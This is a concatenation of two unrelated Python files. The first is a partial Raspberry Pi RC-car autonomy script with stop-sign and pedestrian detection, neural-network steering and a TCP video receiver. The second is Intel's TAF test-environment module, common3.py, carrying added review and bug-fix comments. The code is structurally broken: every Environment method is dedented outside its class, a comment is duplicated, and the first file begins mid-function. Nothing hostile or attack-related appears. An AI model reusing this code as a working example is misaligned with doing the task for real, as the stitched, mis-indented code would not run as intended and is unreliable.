            cv2.rectangle(image, (x_pos+5, y_pos+5), (x_pos+width-5, y_pos+height-5), (0, 0, 255), 2)
            cv2.putText(image, 'STOP SIGN', (x_pos, y_pos-10), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 0, 255), 2)

        # Execute the full stop
        if np.any(stop_sign_detected):
            rcdriver.stop()

        # PEDESTRIAN
        # NOTE(review): the HOG descriptor is rebuilt on every call -- it
        # could be hoisted to __init__; confirm before changing behaviour.
        hog = cv2.HOGDescriptor()
        hog.setSVMDetector(cv2.HOGDescriptor_getDefaultPeopleDetector())

        orig = image.copy()

        # Look for predestrians in the image
        (rects, weights) = hog.detectMultiScale(image, winStride=(4, 4),
                                                padding=(8, 8), scale=1.05)

        # Draw the ORIGINAL bounding boxes
        for (x, y, w, h) in rects:
            cv2.rectangle(orig, (x, y), (x + w, y + h), (0, 0, 255), 2)

        # Apply 'non-maxima suppression' to the bounding boxes using a fairly large overlap threshold to try to maintain overlapping
        # boxes that are still people
        rects = np.array([[x, y, x + w, y + h] for (x, y, w, h) in rects])
        pick = non_max_suppression(rects, probs=None, overlapThresh=0.65)

        # Draw the FINAL bounding boxes
        for (xA, yA, xB, yB) in pick:
            cv2.rectangle(image, (xA, yA), (xB, yB), (0, 255, 0), 2)
            cv2.putText(image, 'PEDESTRIAN', (xA, yA-10), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (0, 255, 0), 2)
obj_detection = ObjectDetection()
class NeuralNetwork(object):
    """Streams frames from the Pi, runs detection + steering prediction."""

    global stop_classifier
    global timestr

    def __init__(self, receiving=False, piVideoObject=None):
        self.receiving = receiving
        self.model = keras.models.load_model('nn_h5/nn.h5')
        # PiVideoStream class object is now here.
        self.piVideoObject = piVideoObject
        self.rcdriver = RCDriver()
        self.fetch()

    def auto_canny(self, blurred):
        """Canny edge detection with thresholds derived from the median intensity."""
        global SIGMA
        v = np.median(blurred)
        lower = int(max(0, (1.0 - SIGMA) * v))
        upper = int(min(255, (1.0 + SIGMA) * v))
        return cv2.Canny(blurred, lower, upper)

    def preprocess(self, frame):
        """Flatten a frame into the 1x38400 float32 row the model expects."""
        image_array = frame.reshape(1, 38400).astype(np.float32)
        return image_array / 255.

    def predict(self, image):
        """Return (one-hot prediction, raw probability row) for a frame."""
        image_array = self.preprocess(image)
        y_hat = self.model.predict(image_array)
        i_max = np.argmax(y_hat)
        y_hat_final = np.zeros((1, 3))
        np.put(y_hat_final, i_max, 1)
        return y_hat_final[0], y_hat

    def fetch(self):
        """Main loop: grab frames, detect objects, predict steering, drive."""
        frame = 0
        while self.receiving:
            # The Main thread can get here before the streaming thread has
            # published its first frame, so spin until one is available.
            jpg = None
            while jpg is None:
                jpg = self.piVideoObject.frame
            # BUG FIX: np.fromstring is deprecated for binary input;
            # np.frombuffer is the supported equivalent.
            gray = cv2.imdecode(np.frombuffer(jpg, dtype=np.uint8), cv2.IMREAD_GRAYSCALE)
            image = cv2.imdecode(np.frombuffer(jpg, dtype=np.uint8), cv2.IMREAD_UNCHANGED)
            # Object detection
            obj_detection.detect(stop_classifier, gray, image)
            # Lower half of the grayscale image
            roi = gray[120:240, :]
            # Apply GuassianBlur (reduces noise)
            blurred = cv2.GaussianBlur(roi, (3, 3), 0)
            # Apply Canny filter
            auto = self.auto_canny(blurred)
            # Show streaming images
            cv2.imshow('Original', image)
            cv2.imshow('What the model sees', auto)
            # Neural network model makes prediction
            prediction, probas = self.predict(auto)
            # Save frame and prediction record for debugging research
            prediction_english = None
            prediction_english_proba = None
            proba_left, proba_right, proba_forward = probas[0]
            if np.all(prediction == [0., 0., 1.]):
                prediction_english = 'FORWARD'
                prediction_english_proba = proba_forward
            elif np.all(prediction == [1., 0., 0.]):
                prediction_english = 'LEFT'
                prediction_english_proba = proba_left
            elif np.all(prediction == [0., 1., 0.]):
                prediction_english = 'RIGHT'
                prediction_english_proba = proba_right
            cv2.putText(gray, "Prediction (sig={}): {}, {:>05}".format(SIGMA, prediction_english, prediction_english_proba), (10, 30), cv2.FONT_HERSHEY_SIMPLEX, .45, (255, 255, 0), 1)
            cv2.imwrite('test_frames_temp/frame{:>05}.jpg'.format(frame), gray)
            frame += 1
            # Send prediction to driver to tell it how to steer
            self.rcdriver.steer(prediction)
            if cv2.waitKey(1) & 0xFF == ord('q'):
                # BUG FIX: the original called self.stop(), which does not
                # exist on this class (AttributeError at runtime). Ending
                # the receive loop is the intended behavior.
                self.receiving = False
        cv2.destroyAllWindows()
class PiVideoStream(object):
    """Accepts the Pi's TCP MJPEG stream and publishes the latest frame."""

    def __init__(self):
        self.server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # The IP address of your computer. This script should run before the one on the Pi.
        self.server_socket.bind(('10.10.10.2', 8000))
        print('Listening...')
        self.server_socket.listen(0)
        # Accept a single connection ('rb' is 'read binary')
        self.connection = self.server_socket.accept()[0].makefile('rb')
        # initialize the frame and the variable used to indicate
        # if the thread should be stopped
        self.frame = None
        self.stopped = False
        self.stream_bytes = ' '
        self.start()

    def start(self):
        """Start the background reader thread, then hand control to the NN."""
        print('Starting PiVideoStream thread...')
        print(' "Hold on to your butts!" ')
        # Start a new thread
        t = threading.Thread(target=self.update, args=())
        t.daemon = True
        t.start()
        print('...thread running')
        # Main thread diverges from the new thread and activates the neural_network.
        # The piVideoObject argument ('self') passes this object to NeuralNetwork.
        NeuralNetwork(receiving=True, piVideoObject=self)

    def update(self):
        """Reader loop: split the byte stream on JPEG SOI/EOI markers."""
        while True:
            # BUG FIX: honor the stop flag. This check existed only as a
            # comment, so the reader thread could never be terminated.
            if self.stopped:
                self.connection.close()
                return
            self.stream_bytes += self.connection.read(1024)
            first = self.stream_bytes.find('\xff\xd8')  # JPEG start-of-image
            last = self.stream_bytes.find('\xff\xd9')   # JPEG end-of-image
            if first != -1 and last != -1:
                self.frame = self.stream_bytes[first:last + 2]
                self.stream_bytes = self.stream_bytes[last + 2:]

    def read(self):
        """Return the most recently received JPEG frame."""
        return self.frame

    def stop(self):
        """Signal the reader thread to terminate.

        BUG FIX: the __main__ shutdown path calls video_stream.stop(), but
        this method was commented out, so shutdown raised AttributeError.
        """
        self.stopped = True
if __name__ == '__main__':
    video_stream = None
    try:
        # Create an instance of PiVideoStream class
        video_stream = PiVideoStream()
    except KeyboardInterrupt:
        # Rename the folder that collected all of the test frames, then make
        # a new folder to collect the next round of test frames.
        os.rename('./test_frames_temp', './test_frames_SAVED/test_frames_{}'.format(timestr))
        os.makedirs('./test_frames_temp')
        print('\nTerminating...\n')
        car.pause(10000)
        # BUG FIX: the original constructed a SECOND PiVideoStream here,
        # which would bind/listen all over again; reuse the existing one.
        # It may still be None if the interrupt hit during construction.
        if video_stream is not None:
            video_stream.stop()
            video_stream.connection.close()
        # Close serial connection to Arduino controller.
        try:
            # NOTE(review): 'port' was never defined in the original file, so
            # this line always raised NameError. Confirm the intended serial
            # port; the guard keeps shutdown from crashing meanwhile.
            ser = serial.Serial(port.device, 9600)
            ser.close()
        except NameError:
            pass
        print('\nDone.\n')
|
common3.py | # Copyright (c) 2011 - 2017, Intel Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""``common3.py``
`Testlib common functionality version 3.x`
"""
# Python built-in imports
import sys
import json
import os
import itertools
import traceback
from threading import Thread
import pytest
# Testlib imports
from .custom_exceptions import TAFCoreException
from . import entry_template
from . import environment
from . import loggers
# Version of the testlib common API implemented by this module.
VERSION = "3.0"

# Accessible from other modules list of loaded classes from dev_ files.
custom_classes = {}
# Add soft exit with environment sanitizing before exit.
# Add soft exit with environment sanitizing before exit.
def softexit(message, env=None):
    """Terminate the py.test run, sanitizing the environment first if given.

    Args:
        message(str): Exit message forwarded to pytest.exit.
        env(Environment): Environment instance to sanitize, or None.
    """
    if env is None:
        pytest.exit(message)
    env.sanitize()
    pytest.exit(message)

pytest.softexit = softexit
# Environment is inherited from dict to provide backward compatibility with TAFv1 suites
class Environment(dict):
    """Main class of all test environment.

    Notes:
        This class has to be used as base fixture in all test cases.
        It provides number of common methods to initialize, shutdown,
        cleanup environment functions which basically call appropriate methods of particular device classes.
    """

    # Logger shared by every Environment instance.
    class_logger = loggers.ClassLogger()
def __init__(self, opts=None, **kwargs):
    """Read configuration files and create device objects.

    Args:
        opts(OptionParser): py.test config.option object which contains all py.test cli options.

    Raises:
        TAFCoreException: unexpected entry_type
    """
    super(Environment, self).__init__(**kwargs)
    self.opts = opts
    self._dict = {}
    # Environment config (list of entry dicts) loaded from the --env file.
    self.config = self._get_conf(self.opts.env)
    self.setup = {}
    if self.opts.setup:
        self.setup = self._get_setup(self.opts.setup)
    # Map acroname to conf id
    self.dut_map = {}
    # Map config Id to instance index
    self.id_map = {}
    # Environment properties
    self.env_prop = {}
    # Device classes
    self.__dev = {}
    # Map autoname to conf Id
    self.autoname_map = {}
    # Get device classes
    device_module_names = self._find_dev_modules()
    self._import_device_modules(device_module_names)
    # Make loaded classes from dev_ file accessible for other modules
    for key, value in self.__dev.items():
        custom_classes[key] = value
    # Create env config according to setup
    new_config = [self.create_conf_entry(setup_entry) for setup_entry in self.setup['env']]
    # create a set from related ids lists
    related_ids = set(itertools.chain.from_iterable(
        conf_entry.get('related_id', []) for conf_entry in new_config))
    # Add related config entries from environment config if they are not already in new_config
    new_config_ids = set(_x['id'] for _x in new_config)
    # find the unadded related_ids.
    new_related_ids = related_ids - new_config_ids
    related_configs = [
        next(_e for _e in self.config if _e['id'] == rid) for rid in new_related_ids]
    new_config.extend(related_configs)
    # Save updated config
    self.config = new_config
    self.class_logger.info("Preparing environment objects.")
    # reading and appending config and creating instances
    for entry in self.config:
        self.class_logger.info(
            "Creating {0}:{1}:{2}".format(entry['entry_type'], entry['instance_type'],
                                          entry['id']))
        # Append related configs
        if "related_id" in entry:
            entry['related_conf'] = self._append_related_confs(entry['related_id'])
        # Creating setup entries instances
        try:
            ename = self.__dev[entry['entry_type']]['NAME']
        except KeyError:
            message = ("Unexpected value for entry_type: '%s' specified with id: '%s' " +
                       "added in config.") % (entry['entry_type'], entry['id'])
            raise TAFCoreException(message)
        # always create a switch objects so that
        # all the switch related plugins that expect a switch attribute
        # fail gracefully
        if not hasattr(self, "switch"):
            setattr(self, "switch", {})
        if not hasattr(self, ename):
            setattr(self, ename, {})
        # Instances of the same kind are numbered from 1 in creation order.
        eid = len(getattr(self, ename)) + 1
        # Append ID maps
        self.dut_map["%s%s" % (self.__dev[entry['entry_type']]['LINK_NAME'], eid)] = entry['id']
        # Create entry instance
        getattr(self, ename)[eid] = self.__dev[entry['entry_type']][entry['instance_type']](
            entry, self.opts)
        getattr(self, ename)[eid].env = self
        self.id_map[entry['id']] = getattr(self, ename)[eid]
        # In case entry contains autoname Environment object will contain d_<autoname>
        # attribute.
        if entry.get('autoname', False):
            # Append autoname and Id
            setattr(self, "d_{0}".format(entry['autoname']), getattr(self, ename)[eid])
            self.autoname_map[entry['autoname']] = entry['id']
    # Pass required by entries related objects:
    for entry in self.config:
        if "related_id" in entry:
            self.id_map[entry['id']].related_obj = dict(
                [(_id, self.id_map[_id]) for _id in entry['related_id']])
    # To support heterogeneous setup we need to support multiple Cross connection types,
    # but allow user to be independent from this.
    # Cross object automatically detects connection owner and forward it to proper cross instance.
    self.cross = Cross(self.setup, self)
    # Append connections lists for cross entries.
    if "cross" in self.setup:
        for c_id in self.setup['cross']:
            self.id_map[c_id].connections = self.setup['cross'][c_id]
    # TODO: Add transparent support of multiple TG instances in one.
def _import_device_modules(self, device_module_names):
    """Import dev_* modules and register their entry classes in self.__dev.

    Args:
        device_module_names(list[str]): dotted module names relative to testlib
            (as produced by _find_dev_modules, e.g. 'foo.dev_bar').
    """
    for mod_name in device_module_names:
        self.class_logger.debug("Loading %s module...", mod_name)
        try:
            new_module = __import__("testlib." + mod_name, fromlist=[mod_name])
        except ImportError:
            self.class_logger.warning("failed to import %s", mod_name, exc_info=True)
            # ignore modules that can't load, e.g. dependency problems such as tempest
            # instead failed when we try to instantiate the class
            continue
        # insert into global namespace
        globals()[mod_name] = new_module
        if new_module.ENTRY_TYPE and new_module.ENTRY_TYPE not in self.__dev:
            self.__dev[new_module.ENTRY_TYPE] = {
                "NAME": new_module.NAME,
                "LINK_NAME": getattr(new_module, 'LINK_NAME', new_module.NAME),
            }
        # Only register classes derived from the common GenericEntry template.
        for instance_name, entry_class in new_module.INSTANCES.items():
            if issubclass(entry_class, entry_template.GenericEntry):
                self.class_logger.debug(
                    "Found entry_type {0}, instance_type {1}.".format(new_module.ENTRY_TYPE,
                                                                      instance_name))
                self.__dev[new_module.ENTRY_TYPE][instance_name] = entry_class
def create_conf_entry(self, setup_entry):
    """Merge a setup entry with its matching environment config entry.

    The environment entry with the same 'id' (if any) serves as the base and
    is updated in place with the setup entry's keys; when no match exists the
    setup entry itself is returned unchanged.
    """
    base_entry = setup_entry
    for cfg_entry in self.config:
        if cfg_entry['id'] == setup_entry['id']:
            base_entry = cfg_entry
            break
    # Setup keys override environment keys.
    base_entry.update(setup_entry)
    return base_entry
def _find_dev_modules(self):
    """Discover dev_*.py modules under testlib and return their dotted names."""
    # extract this so we can override in unittests
    testlib_path = os.path.dirname(__file__)
    found = []
    for root, _dirs, filenames in os.walk(testlib_path):
        for fname in filenames:
            if not (fname.startswith("dev_") and fname.endswith(".py")):
                continue
            # create module name relative to testlib:
            # foo/dev_bar.py -> foo.dev_bar
            rel_path = os.path.relpath(os.path.join(root, fname), testlib_path)
            found.append(os.path.splitext(rel_path)[0].replace(os.sep, '.'))
    return found
def _get_conf(self, file_name=None):
    """Load environment config from file.

    Args:
        file_name(str): Name of a json file with a test environment configuration.

    Raises:
        TAFCoreException: configuration file is not found
        IOError: error on reading configuration file

    Returns:
        dict: dict of the selected configuration.

    Notes:
        This method shouldn't be used outside this class. Use "config" attribute to access environment configuration.
    """
    if not file_name:
        self.class_logger.info("Environment file isn't set. All configurations will be taken from setup file.")
        # Return empty dict
        return dict()
    path_to_config = environment.get_conf_file(conf_name=file_name, conf_type="env")
    if not path_to_config:
        message = "Specified configuration file %s not found." % (file_name, )
        raise TAFCoreException(message)
    try:
        # FIX: use a context manager so the file handle is always closed
        # (the original leaked it), and drop the json.loads 'encoding'
        # kwarg — it was ignored on Python 3 and removed in Python 3.9.
        with open(path_to_config) as conf_file:
            config = json.loads(conf_file.read())
    except Exception:
        # Narrowed from a bare 'except:' so KeyboardInterrupt/SystemExit propagate.
        message = "Cannot read specified configuration: %s" % (path_to_config, )
        self.class_logger.error(message)
        raise IOError(message)
    return config

def _get_setup(self, file_name):
    """Reads setup file based on provided name.

    Args:
        file_name(str): Name of a json file with setup.

    Raises:
        TAFCoreException: setup file is not found
        IOError: error on reading setup file

    Returns:
        list[dict]: setup json content.
    """
    if not file_name:
        message = "Setup name must be specified."
        raise TAFCoreException(message)
    path_to_config = environment.get_conf_file(conf_name=file_name, conf_type="setup")
    if not path_to_config:
        message = "Cannot find given setup %s" % (file_name, )
        raise TAFCoreException(message)
    try:
        # Same fixes as _get_conf: context manager + removed 'encoding' kwarg.
        with open(path_to_config) as setup_file:
            setup = json.loads(setup_file.read())
    except Exception:
        message = "Cannot read specified setup configuration: %s" % (path_to_config, )
        self.class_logger.error(message)
        raise IOError(message)
    return setup
def _get_device_conf(self, device_id):
    """Return config entry by given Id if one, else return None.

    Args:
        device_id(str): Entry ID.

    Returns:
        dict: Entry config, or None when no entry matches.
    """
    for entry in self.config:
        if entry['id'] == device_id:
            return entry
    return None
def id2instance(self, device_id):
    """Returns entry instance by device id.

    Args:
        device_id(str): Could be one of: device LINK_NAME, 'autoname' or 'id' from config.

    Returns:
        GenericEntry: Entry instance

    Examples::

        env.id2instance("sw1")         # by LINK_NAME
        env.id2instance("DEV2")        # by "autoname"
        env.id2instance("9")           # by ID
    """
    dev_id = self.get_device_id(device_id)
    # Indexing [0] (not next()) preserves the original IndexError on a miss.
    entry = [e for e in self.config if e['id'] == dev_id][0]
    instance = None
    for candidate in getattr(self, self.__dev[entry['entry_type']]['NAME']).values():
        if candidate.id == dev_id:
            instance = candidate
            break
    return instance
def _append_related_confs(self, conf_ids):
    """Create dictionary with related device configurations.

    Args:
        conf_ids(list[str]): List of related config IDs.

    Raises:
        TAFCoreException: configuration is not found for specific device ID

    Returns:
        dict: Dictionary with related device configurations
    """
    related_confs = {}
    for device_id in conf_ids:
        conf = self._get_device_conf(device_id)
        if not conf:
            # CONSISTENCY FIX: raise the library's own exception type (was a
            # bare Exception). TAFCoreException derives from Exception, so
            # existing broad handlers keep working.
            raise TAFCoreException("Configuration for device with id: %s not found." % device_id)
        related_confs[device_id] = conf
    return related_confs
def safe_executor(self, obj, method, *args, **kwargs):
    """Invoke obj.method(*args, **kwargs), returning an error message on failure.

    Args:
        obj(GenericEntry): Entry instance
        method(str): method name that has to be executed

    Returns:
        str: Error message with traceback (None on success)

    Warning:
        - Don't use in case obj.method has to return something.
        - Don't use in case an exception has to be handled by py.test.
    """
    try:
        self.class_logger.debug("Perform %s(*%s, **%s) on entry_type=%s, id=%s" %
                                (method, args, kwargs, obj.type, obj.id))
        getattr(obj, method)(*args, **kwargs)
    except Exception:
        # traceback.format_exc() is equivalent to joining format_exception()
        # over sys.exc_info(), just more direct.
        message = ("Error while call %s of entry_type=%s id=%s:\n%s" %
                   (method, obj.type, obj.id, traceback.format_exc()))
        self.class_logger.error(message)
        return message
def parallelize(self, objects, method, safe=False):
    """Run objects method in multiple threads.

    Args:
        objects(list[GenericEntry]): list of device objects.
        method(str): method name that has to be executed.
        safe(bool): Hide exception raisings, but print log message.

    Returns:
        None

    Examples::

        objects = [env.lhost[1], env.lhost[2]]
        env.parallelize(objects, "cleanup", False)
    """
    def _invoke(target_obj, method_name):
        return getattr(target_obj, method_name)()

    # In safe mode route calls through safe_executor, which logs instead of raising.
    worker = self.safe_executor if safe else _invoke
    workers = [Thread(target=worker, args=(obj, method)) for obj in objects]
    for thread in workers:
        thread.start()
    for thread in workers:
        thread.join()
def ordered_action(self, action, prio, entry_types):
    """Perform action on entries with type in entry_types and ordered by prio.

    Args:
        action(str): method name to execute.
        prio(str): priority name to sort objects by.
        entry_types(list[str]): entry types to apply action (apply action to all entry types if None).

    Returns:
        None
    """
    # Select all types in case list isn't set.
    if not entry_types:
        entry_types = list(self.__dev.keys())
    prio_dict = self._get_prio_dict(prio)
    # Drop entries whose type was not requested; iterate over a copy of each
    # member list because items are removed while walking.
    for members in prio_dict.values():
        for item in members[:]:
            if self._get_device_conf(item.id)['entry_type'] not in entry_types:
                members.remove(item)
    # Execute in ascending priority order.
    for level in sorted(prio_dict.keys()):
        group = prio_dict[level]
        if len(group) > 1 and self.opts.use_parallel_init:
            self.parallelize(group, action)
        else:
            for obj in group:
                self.class_logger.debug("Perform %s() on entry_type=%s, id=%s" %
                                        (action, obj.type, obj.id))
                getattr(obj, action)()
def _get_prio_dict(self, prio):
    """Return dict of entries by prio.

    Args:
        prio(str): Priority name to order dict by.

    Returns:
        dict: dict of lists where key = priority, value = list of device objects.
    """
    prio_dict = {}
    for conf_entry in self.config:
        # Default priority is 0 when the attribute is absent.
        level = conf_entry.get(prio, 0)
        prio_dict.setdefault(level, []).append(self.id_map[conf_entry['id']])
    return prio_dict
def initialize(self, entry_types=None):
    """Initialize test environment.

    Args:
        entry_types(list[str]): List of entry types
    """
    self.class_logger.info("Initialize environment...")
    # create() on each entry, ordered by start priority ('sprio').
    self.ordered_action("create", "sprio", entry_types)

def cleanup(self, entry_types=None):
    """Cleaning environment.

    Args:
        entry_types(list[str]): List of entry types
    """
    self.class_logger.info("Cleanup environment...")
    # cleanup() on each entry, ordered by cleanup priority ('cprio').
    self.ordered_action("cleanup", "cprio", entry_types)

def sanitize(self, entry_types=None):
    """Sanitizing environment.

    Args:
        entry_types(list[str]): List of entry types
    """
    self.class_logger.info("Sanitizing environment...")
    # sanitize() on each entry, ordered by kill priority ('kprio').
    self.ordered_action("sanitize", "kprio", entry_types)

def check(self, entry_types=None):
    """Checking environment.

    Args:
        entry_types(list[str]): List of entry types
    """
    self.class_logger.info("Check environment...")
    # check() on each entry, ordered by test priority ('tprio').
    self.ordered_action("check", "tprio", entry_types)
def shutdown(self, entry_types=None):
    """Stopping/Disconnecting environment.

    Args:
        entry_types(list[str]): List of entry types

    Note:
        This method cares to release all environment even an exception is raised during destroy process.
        NOTE(review): unlike the other lifecycle methods, entry_types is
        accepted but never used here — destroy runs on ALL entries. Confirm
        whether filtering was intended.
    """
    # Keep all error messages and print them at the end.
    # This object won't be append in case parallelize execution.
    error_messages = []
    # Sort by start priorities
    prio_dict = self._get_prio_dict("kprio")
    s_list = sorted(prio_dict.keys())
    # In further method calling we set safe flag or use safe_executor
    # to log and pass exceptions on destroy.
    for _s in s_list:
        if len(prio_dict[_s]) > 1 and self.opts.use_parallel_init:
            # Parallel path: errors are logged by safe_executor but not collected.
            self.parallelize(prio_dict[_s], "destroy", True)
        else:
            for obj in prio_dict[_s]:
                err_msg = self.safe_executor(obj, "destroy")
                if err_msg:
                    error_messages.append(err_msg)
    if error_messages:
        message = "The following errors encountered on environment shutdown:\n%s" % ("".join(error_messages), )
        self.class_logger.error(message)
        # if stdout logging is disabled print error messages anyway
        if not loggers.LOG_STREAM:
            sys.stderr.write("ERROR:\n%s" % (message, ))
            sys.stderr.flush()
def get_device_id(self, dut):
    """Search device in config object by device name.

    Args:
        dut(str): Could be one of: device LINK_NAME, 'autoname' or 'id' from config.

    Raises:
        TAFCoreException: unknown device type

    Returns:
        str, int: Device id which configured.

    Examples::

        env.get_device_id("sw1") == 5    # by LINK_NAME
        env.get_device_id("DEV2") == 9   # by "autoname"
        env.get_device_id(9) == 9        # by ID
    """
    # Already a config id? Return it untouched.
    if dut in list(self.dut_map.values()):
        return dut
    # Otherwise resolve through the acronym maps (LINK_NAME first, then autoname).
    for mapping in (self.dut_map, self.autoname_map):
        if dut in mapping:
            return mapping[dut]
    message = "This device type not found. This method supports only %s or %s device types." % (list(self.dut_map.keys()), list(self.autoname_map.keys()))
    raise TAFCoreException(message)
def get_real_port_name(self, dut, port_id):
    """Search real port number/name by device name and port Id in config object.

    Args:
        dut(str): Could be one of: device LINK_NAME, 'autoname' or 'id' from config.
        port_id(int): Port Id from config object (ids starts from 1).

    Raises:
        TAFCoreException: port_id is not found in configuration; device doesn't have ports or port_list attributes

    Returns:
        int, str: Real port number/name or exception if there is no port with given Id in config.
    """
    # find device ID by acronym, then its live object
    dev_id = self.get_device_id(dut)
    dev_obj = self.id_map[dev_id]
    # WARNING: We HAVE to check ports and port_list in objects instead of configs,
    # because some device classes modify port names.
    # E.g.: json doesn't support tuples, but ports have to be hashable type.
    port_list = getattr(dev_obj, "port_list", None)
    if port_list:
        try:
            return port_list[port_id - 1][0]
        except IndexError:
            raise TAFCoreException(
                "Port ID %s is not found in 'port_list' of %s(%s)." % (port_id, dev_id, dut))
    ports = getattr(dev_obj, "ports", None)
    if ports:
        try:
            return ports[port_id - 1]
        except IndexError:
            raise TAFCoreException(
                "Port ID %s is not found in 'ports' of %s(%s)." % (port_id, dev_id, dut))
    raise TAFCoreException(
        "Device %s(%s) doesn't have 'ports' or 'port_list' attributes." % (dev_id, dut))
def get_port_speed(self, dut, port_id):
    """Search speed port in config object namely in 'port_list' by device name and port Id.

    Args:
        dut(str): Could be one of: device LINK_NAME, 'autoname' or 'id' from config.
        port_id(int): Port Id from config object (ids starts from 1)

    Raises:
        TAFCoreException: port is not present in configuration's 'port_list',
            'port_list' is not configured, or the device id is absent from config.

    Returns:
        int: Port speed.

    Examples::

        env.get_port_speed("sw1", 2) == 40000
        env.get_port_speed("DEV1", 1) == 10000
    """
    # find device id by acronym
    dev_id = self.get_device_id(dut)
    # find device id in config
    for dev_config in self.config:
        if dev_config['id'] == dev_id:
            # find port_id and speed in port_list
            if 'port_list' in dev_config:
                try:
                    return dev_config['port_list'][port_id - 1][1]
                # raise exception if no speed for port
                except IndexError:
                    message = "Port id %s is not configured on device %s." % (port_id, dut)
                    raise TAFCoreException(message)
            # raise exception if not configured port_list
            else:
                message = "List of ports speed is not configured on device %s." % dut
                raise TAFCoreException(message)
    # BUG FIX: the original fell off the loop and silently returned None when
    # the device id was missing from the config; fail loudly instead. This is
    # unreachable in practice because get_device_id validates the id.
    raise TAFCoreException("Device %s (id %s) is not present in the environment config." % (dut, dev_id))
def get_ports(self, links=None):
    """Returns dictionary of ports based on links between devices.

    Args:
        links(list[list]): List of devices in format [['dev1', 'dev2', number_of_links, port_speed], ] (list of lists).
                           Where: \a number_of_links - optional parameter(int or enum - "ALL"); \a port_speed - optional parameter.

    Raises:
        TAFCoreException: wrong link format

    Returns:
        dict: ports

    Examples (Config object like)::

        {
        "env": [
               {"id": 99, "autoname": "DEV1", "port_list": [["port1", 10000], ["port2", 40000], ["port3", 10000]},
               {"id": 100, "port_list": [["port10", 40000], [11, 10000], ["port12", 40000]}
               ]
        "cross": {"ID": [[99, 1, 100, 2], [99, 2, 100, 1]]}
        }

    Result is::

        ports = env.get_ports([['sw1', 'sw2', 1], ])
        assert ports == {('sw2', 'sw1'): {1: "port10"}, ('sw1', 'sw2'): {1: "port1"}}
        ports = env.get_ports([['DEV1', 'sw2', 2], ])
        assert ports == {('sw2', 'sw1'): {1: "port10", 2: 11}, ('sw1', 'sw2'): {1: "port1", 2: "port2"}}
        # with optional parameter "port_speed"
        ports = env.get_ports([['sw1', 'sw2', 1, 10000], ])
        assert ports == {('sw1', 'sw2'): {1: "port1"}, ('sw2', 'sw1'): {1: "11"}}
        # Method returns all links between devices if no any optional parameters
        ports = env.get_ports([['sw1', 'sw2', ], ])
        assert ports == {('sw1', 'sw2'): {1: "port1", 2: "port2"}, ('sw2', 'sw1'): {1: "port10", 2: 11}}
        # The same with enum "ALL"
        ports = env.get_ports([['sw1', 'sw2', "ALL"], ])
        assert ports == {('sw1', 'sw2'): {1: "port1", 2: "port2"}, ('sw2', 'sw1'): {1: "port10", 2: 11}}
        # With optional parameters "port_speed" and "ALL"
        ports = env.get_ports([['sw1', 'sw2', "ALL", 40000], ])
        assert ports == {('sw1', 'sw2'): {1: "port2"}, ('sw2', 'sw1'): {1: "port10"}}
        # Method returns all links between devices if no parameter
        ports = env.get_ports()
        assert ports == {('sw1', 'sw2'): {1: "port1", 2: "port2"}, ('sw2', 'sw1'): {1: "port10", 2: 11}}
    """
    if links:
        # Create empty prototype for ports dictionary
        ports = {}
        for link in links:
            # if not specified all devices
            if len(link) < 2:
                message = "At list is not specified devices."
                raise TAFCoreException(message)
            ports[(link[0], link[1])] = {}
            ports[(link[1], link[0])] = {}
        # Process each link in links
        for link in links:
            # link Ids counter
            link_id = 0
            # if not specified number of links return all links between devices
            if len(link) == 2:
                link.append("ALL")
            # if number of links specified zero then raise exception
            if link[2] == 0:
                message = "Number of links cannot equal zero."
                raise TAFCoreException(message)
            # the flag indicates that was set parameter port_speed
            port_speed_flag = False
            if len(link) == 4:
                port_speed_flag = True
                port_speed = link[3]
            # ports Ids counter
            ports_count = link[2]
            if link[2] == "ALL":
                # NOTE(review): in "ALL" mode the cap starts at 1 and is bumped
                # every time a link is recorded, so collection never stops early.
                ports_count = 1
            # Process setups for each cross
            for cross_id in self.setup['cross']:
                # Each link in setup
                for setup_link in self.setup['cross'][cross_id]:
                    # This list will contain port Ids from setup
                    port_ids = []
                    try:
                        # Search for link in setup. Compare links by devices ID
                        if [setup_link[0], setup_link[2]] == [self.get_device_id(link[0]), self.get_device_id(link[1])]:
                            port_ids = [setup_link[1], setup_link[3]]
                        elif [setup_link[2], setup_link[0]] == [self.get_device_id(link[0]), self.get_device_id(link[1])]:
                            port_ids = [setup_link[3], setup_link[1]]
                    except TAFCoreException as err:
                        message = "Insufficient devices count required for test"
                        pytest.skip(message)
                    # Append ports
                    if port_ids:
                        if port_speed_flag:
                            if link_id < ports_count:
                                # Record the link only when BOTH endpoints match the requested speed.
                                if self.get_port_speed(link[0], port_ids[0]) == self.get_port_speed(link[1], port_ids[1]) == port_speed:
                                    link_id += 1
                                    ports[(link[0], link[1])][link_id] = self.get_real_port_name(link[0], port_ids[0])
                                    ports[(link[1], link[0])][link_id] = self.get_real_port_name(link[1], port_ids[1])
                        else:
                            if link_id < ports_count:
                                link_id += 1
                                ports[(link[0], link[1])][link_id] = self.get_real_port_name(link[0], port_ids[0])
                                ports[(link[1], link[0])][link_id] = self.get_real_port_name(link[1], port_ids[1])
                        if link[2] == "ALL":
                            ports_count += 1
                # If all links are collected
                if link_id == ports_count:
                    break
            if link[2] == "ALL":
                ports_count = link_id
            # Verify that ports dictionary full filed
            if (len(ports[(link[0], link[1])]) < ports_count or
                    len(ports[(link[1], link[0])]) < ports_count or
                    not ports[(link[0], link[1])] or
                    not ports[(link[1], link[0])]):
                if port_speed_flag:
                    message = "No links with required speed {0}".format(port_speed)
                else:
                    message = "Insufficient links count required for test"
                pytest.skip(message)
        self.class_logger.debug("Got the following ports: %s." % (ports, ))
        return ports
    else:
        ports = {}
        # create tuples of existing device connection pairs
        for cross_id in self.setup['cross']:
            for setup_link in self.setup['cross'][cross_id]:
                ports[setup_link[0], setup_link[2]] = {}
                ports[setup_link[2], setup_link[0]] = {}
        # Process each tuple in ports
        for key in ports:
            # link Ids counter
            link_id = 0
            # Process setups for each cross
            for cross_id in self.setup['cross']:
                # Each link in setup
                for setup_link in self.setup['cross'][cross_id]:
